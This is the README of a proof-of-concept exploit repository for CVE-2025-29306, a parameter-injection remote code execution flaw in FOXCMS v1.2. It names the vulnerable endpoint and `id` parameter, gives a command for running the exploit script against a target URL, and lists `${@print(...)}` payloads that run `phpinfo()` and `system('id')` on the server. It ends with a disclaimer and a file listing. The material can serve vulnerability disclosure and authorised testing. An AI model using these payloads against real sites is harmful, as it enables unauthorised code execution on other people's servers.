# FOXCMS Parameter Injection RCE – CVE-2025-29306
This repository contains a Python-based PoC for a Remote Code Execution (RCE) vulnerability affecting FOXCMS v1.2, a Chinese open-source content management system.
> CVE-ID: CVE-2025-29306
> Affects: FOXCMS v1.2
> Type: Service Parameter Injection → Code Execution
---
## Vulnerability Summary
FOXCMS suffers from an insecure parameter parsing mechanism in the `id` parameter on the `/images/index.html` endpoint. This allows payload injection using `${@print()}` expressions, leading to PHP code execution.
---
## PoC Usage
### Requirements
- Python 3.x
- `requests` library
```bash
pip install requests
# Usage
python foxcms_poc.py http://target.com/images/index.html?id=
# The script uses payloads like:
${@print(phpinfo())}
${@print(system('id'))}
# 🔐 Legal Disclaimer
This code is for educational purposes and authorized security testing only.
Do NOT use it on systems you do not own or have permission to test.
Author
Inok009
[4.0K] /data/pocs/e54d4cc1d9629d5f4742278a3e2a0dafd05e7346
├── [2.6K] CVE_2025_29306.py
└── [1014] README.md
0 directories, 2 files